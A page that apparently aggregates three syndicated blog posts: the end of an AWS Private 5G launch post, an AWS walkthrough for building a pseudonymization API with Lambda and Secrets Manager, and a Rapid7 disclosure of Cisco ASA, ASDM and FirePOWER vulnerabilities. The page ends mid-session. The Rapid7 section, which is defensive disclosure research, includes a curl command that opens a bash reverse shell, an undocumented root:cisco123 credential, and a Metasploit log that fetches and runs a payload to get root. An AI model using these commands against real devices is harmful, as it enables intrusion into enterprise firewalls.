Partners – Planning and deploying a private wireless network can be complex and not every enterprise will have the tools to do this work on their own. In addition, CBRS spectrum in the United States requires Certified Professional Installation (CPI) of radios. To address these needs, we are building an ecosystem of partners that can provide customers with radio planning, installation, CPI certification, and implementation of customer use cases. You can access these partners from the AWS Private 5G Console and work with them through the AWS Marketplace.

Deployment Options – In the demo above, I showed you the cloud–based deployment option, which is designed for testing and evaluation purposes, for time-limited deployments, and for deployments that do not use the network in latency-sensitive ways. With this option, the AWS Private 5G Mobile Core runs within a specific AWS Region. We are also working to enable on-premises hosting of the Mobile Core on a Private 5G compute appliance.

CLI and API Access – I can also use the create-network, create-network-site, and acknowledge-order-receipt commands to set up my AWS Private 5G network from the command line. I still need to use the console to place my equipment order.
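
For illustration, here is a rough boto3 sketch of the same flow (the parameter names and response shape below are my reading of the API and should be double-checked against the SDK reference):

import boto3

# The AWS Private 5G API is exposed through the 'privatenetworks' client
p5g = boto3.client('privatenetworks')

# Parameter names are assumptions based on the CLI commands above
network = p5g.create_network(networkName='JeffCell')
site = p5g.create_network_site(
    networkSiteName='JeffSite',
    networkArn=network['network']['networkArn']
)

# After the equipment order has been placed and delivered:
# p5g.acknowledge_order_receipt(orderArn='<order ARN>')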

  • Scaling and Expansion – Each network supports one radio unit that can provide up to 150 Mbps of throughput spread across up to 100 SIMs. We are working to add support for multiple radio units and a greater number of SIM cards per network.

Regions and Locations – We are launching AWS Private 5G in the US East (Ohio), US East (N. Virginia), and US West (Oregon) Regions, and are working to make the service available outside of the United States in the near future.

  • Pricing – Each radio unit is billed at $10 per hour, with a 60-day minimum.

To learn more, read about AWS Private 5G.

Jeff;

Build a pseudonymization service on AWS to protect sensitive data, part 1

Post Syndicated from Rahul Shaurya original https://aws.amazon.com/blogs/big-data/part-1-build-a-pseudonymization-service-on-aws-to-protect-sensitive-data/

According to an article in MIT Sloan Management Review, 9 out of 10 companies believe their industry will be digitally disrupted. In order to fuel the digital disruption, companies are eager to gather as much data as possible. Given the importance of this new asset, lawmakers are keen to protect the privacy of individuals and prevent any misuse. Organizations often face challenges as they aim to comply with data privacy regulations like Europe’s General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA). These regulations demand strict access controls to protect sensitive personal data.

This is a two-part post. In part 1, we walk through a solution that uses a microservice-based approach to enable fast and cost-effective pseudonymization of attributes in datasets. The solution uses the AES-GCM-SIV algorithm to pseudonymize sensitive data. In part 2, we will walk through useful patterns for dealing with data protection for varying degrees of data volume, velocity, and variety using Amazon EMR, AWS Glue, and Amazon Athena.

Data privacy and data protection basics

Before diving into the solution architecture, let’s look at some of the basics of data privacy and data protection. Data privacy refers to the handling of personal information and how data should be handled based on its relative importance, consent, data collection, and regulatory compliance. Depending on your regional privacy laws, the terminology and definition in scope of personal information may differ. For example, privacy laws in the United States use personally identifiable information (PII) in their terminology, whereas GDPR in the European Union refers to it as personal data. Techgdpr explains in detail the difference between the two. Through the rest of the post, we use PII and personal data interchangeably.

Data anonymization and pseudonymization can potentially be used to implement data privacy to protect both PII and personal data and still allow organizations to legitimately use the data.

Anonymization vs. pseudonymization

Anonymization refers to a technique of data processing that aims to irreversibly remove PII from a dataset. The dataset is considered anonymized if it can’t be used to directly or indirectly identify an individual.

Pseudonymization is a data sanitization procedure by which PII fields within a data record are replaced by artificial identifiers. A single pseudonym for each replaced field or collection of replaced fields makes the data record less identifiable while remaining suitable for data analysis and data processing. This technique is especially useful because it protects your PII data at record level for analytical purposes such as business intelligence, big data, or machine learning use cases.

The main difference between anonymization and pseudonymization is that the pseudonymized data is reversible (re-identifiable) to authorized users and is still considered personal data.

Solution overview

The following architecture diagram provides an overview of the solution.

Solution overview

This architecture contains two separate accounts:

  • Central pseudonymization service: Account 111111111111 – The pseudonymization service is running in its own dedicated AWS account (right). This is a centrally managed pseudonymization API that provides access to two resources for pseudonymization and reidentification. With this architecture, you can apply authentication, authorization, rate limiting, and other API management tasks in one place. For this solution, we’re using API keys to authenticate and authorize consumers.
  • Compute: Account 222222222222 – The account on the left is referred to as the compute account, where the extract, transform, and load (ETL) workloads are running. This account depicts a consumer of the pseudonymization microservice. The account hosts the various consumer patterns depicted in the architecture diagram. These solutions are covered in detail in part 2 of this series.

The pseudonymization service is built using AWS Lambda and Amazon API Gateway. Lambda enables the serverless microservice features, and API Gateway provides serverless APIs for HTTP or RESTful and WebSocket communication.

We create the solution resources via AWS CloudFormation. The CloudFormation stack template and the source code for the Lambda function are available in the GitHub repository.

We walk you through the following steps:

  1. Deploy the solution resources with AWS CloudFormation.
  2. Generate encryption keys and persist them in AWS Secrets Manager.
  3. Test the service.

Demystifying the pseudonymization service

Pseudonymization logic is written in Java and uses the AES-GCM-SIV algorithm developed by codahale. The source code is hosted in a Lambda function. Secret keys are stored securely in Secrets Manager. AWS Key Management Service (AWS KMS) makes sure that secrets and sensitive components are protected at rest. The service is exposed to consumers via API Gateway as a REST API. Consumers are authenticated and authorized to consume the API via API keys. The pseudonymization service is technology agnostic and can be adopted by any form of consumer as long as they're able to consume REST APIs.

As depicted in the following figure, the API consists of two resources with the POST method:

API Resources

  • Pseudonymization – The pseudonymization resource can be used by authorized users to pseudonymize a given list of plaintexts (identifiers) and replace them with a pseudonym.
  • Reidentification – The reidentification resource can be used by authorized users to convert pseudonyms to plaintexts (identifiers).

The request response model of the API utilizes Java string arrays to store multiple values in a single variable, as depicted in the following code.

Request/Response model

The API supports a Boolean type query parameter to decide whether encryption is deterministic or probabilistic.

The implementation of the algorithm has been modified to add the logic to generate a nonce, which is dependent on the plaintext being pseudonymized. If the incoming query parameter deterministic has the value True, then the overloaded version of the encrypt function is called. This generates a nonce using the HmacSHA256 function on the plaintext and takes 12 sub-bytes from a predetermined position as the nonce. This nonce is then used for the encryption and prepended to the resulting ciphertext. The following is an example:

  • Identifier – VIN98765432101234
  • Nonce – NjcxMDVjMmQ5OTE5
  • Pseudonym – NjcxMDVjMmQ5OTE5q44vuub5QD4WH3vz1Jj26ZMcVGS+XB9kDpxp/tMinfd9

This approach is useful especially for building analytical systems that may require PII fields to be used for joining datasets with other pseudonymized datasets.

The following code shows an example of deterministic encryption.

Deterministic Encryption

If the incoming query parameter deterministic has the value False, then the encrypt method is called without the deterministic nonce logic and a random 12-byte nonce is generated. This produces a different ciphertext for the same incoming plaintext.

The following code shows an example of probabilistic encryption.

Probabilistic Encryption

The Lambda function utilizes a couple of caching mechanisms to boost the performance of the function. It uses Guava to build a cache to avoid generation of the pseudonym or identifier if it’s already available in the cache. For the probabilistic approach, the cache isn’t utilized. It also uses SecretCache, an in-memory cache for secrets requested from Secrets Manager.

Prerequisites

For this walkthrough, you should have the following prerequisites:

Deploy the solution resources with AWS CloudFormation

The deployment is triggered by running the deploy.sh script. The script runs the following phases:

  1. Checks for dependencies.
  2. Builds the Lambda package.
  3. Builds the CloudFormation stack.
  4. Deploys the CloudFormation stack.
  5. Prints to standard out the stack output.

The following resources are deployed from the stack:

  • An API Gateway REST API with two resources:
    • /pseudonymization
    • /reidentification
  • A Lambda function
  • A Secrets Manager secret
  • A KMS key
  • IAM roles and policies
  • An Amazon CloudWatch Logs group

You need to pass the following parameters to the script for the deployment to be successful:

  • STACK_NAME – The CloudFormation stack name.
  • AWS_REGION – The Region where the solution is deployed.
  • AWS_PROFILE – The named profile that applies to the AWS Command Line Interface (AWS CLI) command.
  • ARTEFACT_S3_BUCKET – The S3 bucket where the infrastructure code is stored. The bucket must be created in the same account and Region where the solution lives.

Use the following commands to run the ./deployment_scripts/deploy.sh script:

chmod +x ./deployment_scripts/deploy.sh
./deployment_scripts/deploy.sh -s STACK_NAME -b ARTEFACT_S3_BUCKET -r AWS_REGION -p AWS_PROFILE

Upon successful deployment, the script displays the stack outputs, as depicted in the following screenshot. Take note of the output, because we use it in subsequent steps.

Stack Output

Generate encryption keys and persist them in Secrets Manager

In this step, we generate the encryption keys required to pseudonymize the plain text data. We generate those keys by calling the KMS key we created in the previous step. Then we persist the keys in a secret. Encryption keys are encrypted at rest and in transit, and exist in plain text only in-memory when the function calls them.

To perform this step, we use the script key_generator.py. You need to pass the following parameters for the script to run successfully:

  • KmsKeyArn – The output value from the previous stack deployment
  • AWS_PROFILE – The named profile that applies to the AWS CLI command
  • AWS_REGION – The Region where the solution is deployed
  • SecretName – The output value from the previous stack deployment

Use the following command to run ./helper_scripts/key_generator.py:

python3 ./helper_scripts/key_generator.py -k KmsKeyArn -s SecretName -p AWS_PROFILE -r AWS_REGION

Upon successful deployment, the secret value should look like the following screenshot.

Encryption Secrets

Test the solution

In this step, we configure Postman and query the REST API, so you need to make sure Postman is installed on your machine. Upon successful authentication, the API returns the requested values.

The following parameters are required to create a complete request in Postman:

  • PseudonymizationUrl – The output value from stack deployment
  • ReidentificationUrl – The output value from stack deployment
  • deterministic – The value True or False for the pseudonymization call
  • API_Key – The API key, which you can retrieve from the API Gateway console

Follow these steps to set up Postman:

  1. Start Postman on your machine.
  2. On the File menu, choose Import.
  3. Import the Postman collection.
  4. From the collection folder, navigate to the pseudonymization request.
  5. To test the pseudonymization resource, replace all variables in the sample request with the parameters mentioned earlier.

The request template in the body already has some dummy values provided. You can use the existing one or exchange with your own.

  1. Choose Send to run the request.

The API returns in the body of the response a JSON data type.
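
Outside of Postman, the same call can be made with a few lines of Python. The following is a minimal sketch: the x-api-key header is how API Gateway expects the API key, while the "identifiers" field name in the payload is an assumption, so check the sample request in the Postman collection for the exact schema.

import requests

PSEUDONYMIZATION_URL = "<PseudonymizationUrl from the stack output>"
API_KEY = "<your API key from the API Gateway console>"

#the "identifiers" field name is an assumption; use the schema from the sample request
payload = {"identifiers": ["VIN98765432101234", "VIN98765432101235"]}

response = requests.post(
    PSEUDONYMIZATION_URL,
    params={"deterministic": "True"},
    headers={"x-api-key": API_KEY},
    json=payload,
    timeout=30
)
print(response.status_code, response.json())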

Reidentification

  1. From the collection folder, navigate to the reidentification request.
  2. To test the reidentification resource, replace all variables in the sample request with the parameters mentioned earlier.
  3. Pass to the response template in the body the pseudonyms output from earlier.
  4. Choose Send to run the request.

The API returns in the body of the response a JSON data type.

Pseudonyms

Cost and performance

There are many factors that can determine the cost and performance of the service. Performance especially can be influenced by payload size, concurrency, cache hit, and managed service limits on the account level. The cost is mainly influenced by how much the service is being used. For our cost and performance exercise, we consider the following scenario:

The REST API is used to pseudonymize Vehicle Identification Numbers (VINs). On average, consumers request pseudonymization of 1,000 VINs per call. The service processes on average 40 requests per second, or 40,000 encryption or decryption operations per second. The average process time per request is as follows:

  • 15 milliseconds for deterministic encryption
  • 23 milliseconds for probabilistic encryption
  • 6 milliseconds for decryption

The number of calls hitting the service per month is distributed as follows:

  • 50 million calls hitting the pseudonymization resource for deterministic encryption
  • 25 million calls hitting the pseudonymization resource for probabilistic encryption
  • 25 million calls hitting the reidentification resource for decryption

Based on this scenario, the average cost is $415.42 USD per month. You may find the detailed cost breakdown in the estimate generated via the AWS Pricing Calculator.

We use Locust to simulate a similar load to our scenario. Measurements from Amazon CloudWatch metrics are depicted in the following screenshots (network latency isn’t considered during our measurement).
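
For reference, the load shape can be reproduced with a short Locust file similar to the following sketch (the host, API key, and payload field name are placeholders and assumptions). Point Locust's host at the API Gateway stage URL so that the /pseudonymization path resolves to the resource created by the stack.

from locust import HttpUser, task, between

class PseudonymizationUser(HttpUser):
    #scale the number of simulated users until ~40 requests per second is reached
    wait_time = between(0.5, 1.5)

    @task
    def pseudonymize(self):
        #1,000 identifiers per call, matching the scenario above
        payload = {"identifiers": [f"VIN{i:017d}" for i in range(1000)]}
        self.client.post(
            "/pseudonymization?deterministic=True",
            json=payload,
            headers={"x-api-key": "<your_api_key>"}
        )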

The following screenshot shows API Gateway latency and Lambda duration for deterministic encryption. Latency is high at the beginning due to the cold start, and flattens out over time.

API Gateway latency and Lambda duration for deterministic encryption

The following screenshot shows metrics for probabilistic encryption.

metrics for probabilistic encryption

The following shows metrics for decryption.

metrics for decryption

Clean up

To avoid incurring future charges, delete the CloudFormation stack by running the destroy.sh script. The following parameters are required to run the script successfully:

  • STACK_NAME – The CloudFormation stack name
  • AWS_REGION – The Region where the solution is deployed
  • AWS_PROFILE – The named profile that applies to the AWS CLI command

Use the following commands to run the ./deployment_scripts/destroy.sh script:

chmod +x ./deployment_scripts/destroy.sh
./deployment_scripts/destroy.sh -s STACK_NAME -r AWS_REGION -p AWS_PROFILE

Conclusion

In this post, we demonstrated how to build a pseudonymization service on AWS. The solution is technology agnostic and can be adopted by any form of consumer as long as they’re able to consume REST APIs. We hope this post helps you in your data protection strategies.

Stay tuned for part 2, which will cover consumption patterns of the pseudonymization service.


About the authors

Edvin Hallvaxhiu is a Senior Global Security Architect with AWS Professional Services and is passionate about cybersecurity and automation. He helps customers build secure and compliant solutions in the cloud. Outside work, he likes traveling and sports.

Rahul Shaurya is a Senior Big Data Architect with AWS Professional Services. He helps and works closely with customers building data platforms and analytical applications on AWS. Outside of work, Rahul loves taking long walks with his dog Barney.

Andrea Montanari is a Big Data Architect with AWS Professional Services. He actively supports customers and partners in building analytics solutions at scale on AWS.

María Guerra is a Big Data Architect with AWS Professional Services. Maria has a background in data analytics and mechanical engineering. She helps customers architect and develop data-related workloads in the cloud.

Pushpraj is a Data Architect with AWS Professional Services. He is passionate about data and DevOps engineering. He helps customers build data-driven applications at scale.

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

Rapid7 discovered vulnerabilities and “non-security” issues affecting Cisco Adaptive Security Appliance (ASA) Software, Adaptive Security Device Manager (ASDM), and FirePOWER Services Software for ASA. Rapid7 initially reported the issues to Cisco in separate disclosures in February and March 2022. Rapid7 and Cisco continued discussing impact and resolution of the issues through August 2022. The following table lists the vulnerabilities and the last current status that we were able to verify ourselves. Note: Cisco notified Rapid7 as this blog was going to press that they had released updated software. We have been unable to verify these fixes, but have marked them with ** in the table.

For information on vulnerability checks in InsightVM and Nexpose, please see the Rapid7 customers section at the end of this blog.

Description Identifier Status
Cisco ASDM binary packages are not signed. A malicious ASDM package can be installed on a Cisco ASA resulting in arbitrary code execution on any client system that connects to the ASA via ASDM. CVE-2022-20829 Not fixed**
The Cisco ASDM client does not verify the server’s SSL certificate, which makes it vulnerable to man-in-the-middle (MITM) attacks. None Not fixed
Cisco ASDM client sometimes logs credentials to a local log file. Cisco indicated this was a duplicate issue, although they updated CVE-2022-20651’s affected versions to include the version Rapid7 reported and issued a new release of ASDM (7.17.1.155) in June. CVE-2022-20651 Fixed
Cisco ASDM client is affected by an unauthenticated remote code execution vulnerability. The issue was originally reported by Malcolm Lashley and was disclosed without a fix by Cisco in July 2021. Cisco reported this issue was fixed in ASDM 7.18.1.150, but Rapid7 has informed Cisco that the issue was in fact not addressed and remains unfixed. Cisco sent a new build for testing prior to publication of this blog, but because of time constraints we were unable to test it. CVE-2021-1585, CSCvw79912 Not fixed**
Cisco ASDM binary package contains an unsigned Windows installer. The ASDM client will prompt the user to execute the unsigned installer or users are expected to download the installer from the ASA and execute it. This is an interesting code execution mechanism to be used with CVE-2022-20829 or CVE-2021-1585. CSCwc21296 Fixed
Cisco ASA-X with FirePOWER Services is vulnerable to an authenticated, remote command injection vulnerability. Using this vulnerability allows an attacker to gain root access to the FirePOWER module. CVE-2022-20828 Fixed in most maintained versions
Cisco FirePOWER module before 6.6.0 allowed a privileged Cisco ASA user to reset the FirePOWER module user’s password. A privileged Cisco ASA user could bypass the FirePOWER module login prompt to gain root access on the FirePOWER module. CSCvo79327 Fixed in most maintained versions
Cisco FirePOWER module boot images before 7.0.0 allow a privileged Cisco ASA user to obtain a root shell via command injection or hard-coded credentials. CSCvu90861 Fixed in boot images >= 7.0. Not fixed on ASA.
Cisco ASA with FirePOWER Services loads and executes arbitrary FirePOWER module boot images. The ASA does not restrict the use of old boot images or even the use of boot images that weren’t created by Cisco. This could result in code execution from a malicious boot image. None Not fixed
Some Cisco FirePOWER module boot images support the installation of unsigned FirePOWER installation packages. This could result in code execution from a malicious package. None Not fixed

** Denotes an advisory Cisco updated as this blog went to press.

Rapid7 will present the vulnerabilities, exploits, and tools at Black Hat USA and DEF CON on August 11 and August 13, respectively.

Product description

Cisco ASA Software is a “core operating system for the Cisco ASA Family.” Cisco ASAs are widely deployed enterprise-class firewalls that also support VPN, IPS, and many other features.

Cisco ASDM is a graphical user interface for remote administration of appliances using Cisco ASA Software.

FirePOWER Services Software is a suite of software that supports the installation of the FirePOWER module on Cisco ASA 5500-X with FirePOWER Services.

Credit

This issue was discovered by Jake Baines of Rapid7, and it is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Analysis

Of all the reported issues, Rapid7 believes the following to be the most critical.

CVE-2022-20829: ASDM binary package is not signed

The Cisco ASDM binary package is installed on the Cisco ASA. Administrators that use ASDM to manage their ASA download and install the Cisco ASDM Launcher on their Windows or macOS system. When the ASDM launcher connects to the ASA, it will download a large number of Java files from the ASA, load them into memory, and then pass execution to the downloaded Java.

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

The ASDM launcher installer, the Java class files, the ASDM web portal, and other files are all contained within the ASDM binary package distributed by Cisco. Rapid7 analyzed the format of the binary package and determined that it lacked any type of cryptographic signature to verify the package’s authenticity (see CWE-347). We discovered that we could modify the contents of an ASDM package, update a hash in the package’s header, and successfully install the package on a Cisco ASA.

The result is that an attacker can craft an ASDM package that contains malicious installers, malicious web pages, and/or malicious Java. An example of exploitation using a malicious ASDM package goes like this: An administrator using the ASDM client connects to the ASA and downloads/executes attacker-provided Java. The attacker then has access to the administrator’s system (e.g. the attacker can send themselves a reverse shell). A similar attack was executed by Slingshot APT against Mikrotik routers and the administrative tool Winbox.

The value of this vulnerability is high because the ASDM package is a distributable package. A malicious ASDM package might be installed on an ASA in a supply chain attack, installed by an insider, installed by a third-party vendor/administrator, or simply made available “for free” on the internet for administrators to discover themselves (downloading ASDM from Cisco requires a valid contract).

Rapid7 has published a tool, the way, that demonstrates extracting and rebuilding “valid” ASDM packages. The way can also generate ASDM packages with an embedded reverse shell. The following video demonstrates an administrative user triggering the reverse shell simply by connecting to the ASA.



Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

Note: Cisco communicated on August 11, 2022 that they had released new software images that resolve CVE-2022-20829. We have not yet verified this information.

CVE-2021-1585: Failed patch

Rapid7 vulnerability research previously described exploitation of CVE-2021-1585 on AttackerKB. The vulnerability allows a man-in-the-middle or evil endpoint to execute arbitrary Java code on an ASDM administrator’s system via the ASDM launcher (similar to CVE-2022-20829). Cisco publicly disclosed this vulnerability without a patch in July 2021. However, at the time of writing, Cisco’s customer-only disclosure page for CVE-2021-1585 indicates that the vulnerability was fixed with the release of ASDM 7.18.1.150 in June 2022.

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

Rapid7 quickly demonstrated to Cisco that this is incorrect. Using our public exploit for CVE-2021-1585, staystaystay, Rapid7 was able to demonstrate the exploit works against ASDM 7.18.1.150 without any code changes.

The following video demonstrates downloading and installing 7.18.1.150 from an ASA and then using staystaystay to exploit the new ASDM launcher. staystaystay only received two modifications:

  • The version.prop file on the web server was updated to indicate the ASDM version is 8.14(1) to trigger the new loading behavior.
  • The file /public/jploader.jar was downloaded from the ASA and added to the staystaystay web server.



Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

Additionally, ASDM 7.18.1.150 is still exploitable when it encounters older versions of ASDM on the ASA. The following shows that Cisco added a pop-up to the ASDM client indicating connecting to the remote ASA may be dangerous, but allows the exploitation to continue if the user clicks “Yes”:



Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

CVE-2021-1585 is a serious vulnerability. Man-in-the-middle attacks are trivial for a well-funded APT; they often have the network position and the motive. It also does not help that ASDM does not validate the remote server’s SSL certificate and uses HTTP Basic Authentication by default (leading to password disclosure to an active MITM). The fact that this vulnerability has been public and unpatched for over a year should be a concern to anyone who administers Cisco ASA using ASDM.

Even if Cisco did release a patch in a timely manner, it’s unclear how widely the patch would be adopted. Rapid7 scanned the internet for ASDM web portals on June 15, 2022, and examined the versions of ASDM being used in the wild. ASDM 7.18.1 had been released a week prior, and less than 0.5% of internet-facing ASDM installations had adopted 7.18.1. Rapid7 found the most popular version of ASDM to be 7.8.2, a version that had been released in 2017.

Note: Cisco communicated on August 11, 2022 that they had released new software images that resolve CVE-2021-1585. We have not yet verified this information.

ASDM Version Count
Cisco ASDM 7.8(2) 3202
Cisco ASDM 7.13(1) 1698
Cisco ASDM 7.15(1) 1597
Cisco ASDM 7.16(1) 1139
Cisco ASDM 7.9(2) 1070
Cisco ASDM 7.14(1) 1009
Cisco ASDM 7.8(1) 891
Cisco ASDM 7.17(1) 868
Cisco ASDM 7.12(2) 756
Cisco ASDM 7.12(1) 745

CVE-2022-20828: Remote and authenticated command injection

CVE-2022-20828 is a remote and authenticated vulnerability that allows an attacker to achieve root access on ASA-X with FirePOWER Services when the FirePOWER module is installed. To better understand what the FirePOWER module is, we reference an image from Cisco’s Cisco ASA FirePOWER Module Quick Start Guide.

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

The FirePOWER module is the white oval labeled “ASA FirePOWER Module Deep Packet Inspection.” The module is a Linux-based virtual machine (VM) hosted on the ASA. The VM runs Snort to classify traffic passing through the ASA. The FirePOWER module is fully networked and can access both outside and inside of the ASA, making it a fairly ideal location for an attacker to hide in or stage attacks from.

The command injection vulnerability is linked to the Cisco command line interface (CLI) session do command. In the example that follows, the command session do `id` is executed on the Cisco ASA CLI via ASDM (HTTP), and the Linux command id is executed within the FirePOWER module.

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

A reverse shell exploit for this vulnerability is small enough to be tweetable (our favorite kind of exploit). The following curl command can fit in a tweet and will generate a bash reverse shell from the FirePOWER module to 10.12.70.252:1270:

curl -k -u albinolobster:labpass1 -H "User-Agent: ASDM/ Java/1.8" "https://10.12.70.253/admin/exec/session+sfr+do+\`bash%20-i%20>&%20%2fdev%2ftcp%2f10.12.70.252%2f1270%200>&1\`"

A Metasploit module has been developed to exploit this issue as well.



Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

The final takeaway for this issue should be that exposing ASDM to the internet could be very dangerous for ASAs that use the FirePOWER module. While this might be a credentialed attack, as noted previously, ASDM’s default authentication scheme discloses usernames and passwords to active MITM attackers. The ASDM client has also recently logged credentials to file (CVE-2022-20651), is documented to support the credentials <blank>:<blank> by default (see “Start ASDM”, Step 2), and, by default, doesn’t have brute-force protections enabled. All of that makes the following a very real possibility.

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

To further demonstrate ASDM password weaknesses, we’ve published Metasploit modules for brute-forcing credentials on the ASDM interface and searching through ASDM log files for valid credentials.

CSCvu90861: FirePOWER boot image root shell

In the previous section, we learned about the Cisco FirePOWER module. In this section, it’s important to know how the FirePOWER module is installed. Installation is a three-step process:

  • Upload and start the FirePOWER boot image.
  • From the boot image, download and install the FirePOWER installation package.
  • From the FirePOWER module VM, install the latest updates.

CSCvu90861 concerns itself with a couple of issues associated with the boot image found in step 1. The boot image, once installed and running, can be entered using the Cisco ASA command session sfr console:

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

As you can see, the user is presented with a very limited CLI that largely only facilitates network troubleshooting and installing the FirePOWER installation package. Credentials are required to access this CLI. These credentials are well-documented across the various versions of the FirePOWER boot image (see “Set Up the ASA SFR Boot Image, Step 1”). However, what isn’t documented is that the credentials root:cisco123 will drop you down into a root bash shell.

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

The FirePOWER boot image, similar to the normal FirePOWER module, is networked. It can be configured to use DHCP or a static address, but either way, it has access to inside and outside of the ASA (assuming typical wiring). Again, a perfect staging area for an attacker and a pretty good place to hide.

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

We also discovered a command injection vulnerability associated with the system install command that yields the same result (root access on the boot image).

Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software

We wrote two SSH-based exploits that demonstrate exploitation of the boot image. The first is a stand-alone Python script, and the second is a Metasploit module. Exploitation takes about five minutes, so Metasploit output will have to suffice on this one:

albinolobster@ubuntu:~/metasploit-framework$ ./msfconsole 
                                                  
 ______________________________________
/ it looks like you're trying to run a \
\ module                               /
 --------------------------------------
 \
  \
     __
    /  \
    |  |
    @  @
    |  |
    || |/
    || ||
    |\_/|
    \___/


       =[ metasploit v6.2.5-dev-ed2c64bffd                ]
+ -- --=[ 2228 exploits - 1172 auxiliary - 398 post       ]
+ -- --=[ 863 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can pivot connections over sessions 
started with the ssh_login modules

[*] Starting persistent handler(s)...
msf6 > use exploit/linux/ssh/cisco_asax_firepower_boot_root
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > show options

Module options (exploit/linux/ssh/cisco_asax_firepower_boot_root):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   ENABLE_PASSWORD                   yes       The enable password
   IMAGE_PATH                        yes       The path to the image on the ASA (e.g. disk0:/asasfr-5500x-boot-6.2.3-4.img
   PASSWORD         cisco123         yes       The password for authentication
   RHOSTS                            yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT            22               yes       The target port (TCP)
   SRVHOST          0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT          8080             yes       The local port to listen on.
   SSL              false            no        Negotiate SSL for incoming connections
   SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                           no        The URI to use for this exploit (default is random)
   USERNAME         cisco            yes       The username for authentication


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > set IMAGE_PATH disk0:/asasfr-5500x-boot-6.2.3-4.img
IMAGE_PATH => disk0:/asasfr-5500x-boot-6.2.3-4.img
msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > set USERNAME albinolobster
USERNAME => albinolobster
msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > set LHOST 10.12.70.252
LHOST => 10.12.70.252
msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > set RHOST 10.12.70.253
RHOST => 10.12.70.253
msf6 exploit(linux/ssh/cisco_asax_firepower_boot_root) > run

[*] Started reverse TCP handler on 10.12.70.252:4444 
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Using URL: http://10.12.70.252:8080/ieXiNV
[*] 10.12.70.253:22 - Attempting to login...
[+] Authenticated with the remote server
[*] Resetting SFR. Sleep for 120 seconds
[*] Booting the image... this will take a few minutes
[*] Configuring DHCP for the image
[*] Dropping to the root shell
[*] wget -qO /tmp/scOKRuCR http://10.12.70.252:8080/ieXiNV;chmod +x /tmp/scOKRuCR;/tmp/scOKRuCR;rm -f /tmp/scOKRuCR
[*] Client 10.12.70.253 (Wget) requested /ieXiNV
[*] Sending payload to 10.12.70.253 (Wget)
[*] Sending stage (989032 bytes) to 10.12.70.253
[*] Meterpreter session 1 opened (10.12.70.252:4444 -> 10.12.70.253:53445) at 2022-07-05 07:37:22 -0700
[+] Done!
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Server stopped.

meterpreter > shell
Process 2160 created.
Channel 1 created.
uname -a
Linux asasfr 3.10.107sf.cisco-1 #1 SMP PREEMPT Fri Nov 10 17:06:45 UTC 2017 x86_64 GNU/Linux
id
uid=0(root) gid=0(root)

This attack can be executed even if the FirePOWER module is installed. The attacker can simply uninstall the FirePOWER module and start the FirePOWER boot image (although that is potentially quite obvious depending on FirePOWER usage). However, this attack seems more viable as ASA-X ages and Cisco stops releasing new rules/updates for the FirePOWER module. Organizations will likely continue using ASA-X with FirePOWER Services without FirePOWER enabled/installed simply because they are “good” Cisco routers.

Malicious FirePOWER boot image

The interesting thing about vulnerabilities (or non-security issues, depending on who you are talking to) affecting the FirePOWER boot image is that the Cisco ASA has no mechanism that prevents users from loading and executing arbitrary images. Cisco removed the hard-coded credentials and command injection in FirePOWER boot images >= 7.0.0, but an attacker can still load and execute an older FirePOWER boot image that retains the vulnerabilities.

In fact, there is nothing preventing a user from booting an image of their own creation. FirePOWER boot images are just bootable Linux ISOs. We wrote a tool that generates a bootable TinyCore ISO that can be executed on the ASA. When booted, the ISO spawns a reverse shell out to the attacker and starts an SSH server, and it comes with DOOM-ASCII installed (in case you want to play DOOM on an ASA). The generated ISO is installed on the ASA just as any FirePOWER boot image would be:

albinolobster@ubuntu:~/pinchme$ ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 [email protected]
[email protected]'s password: 
User albinolobster logged in to ciscoasa
Logins over the last 5 days: 42.  Last login: 23:41:56 UTC Jun 10 2022 from 10.0.0.28
Failed logins since the last login: 0.  Last failed login: 23:41:54 UTC Jun 10 2022 from 10.0.0.28
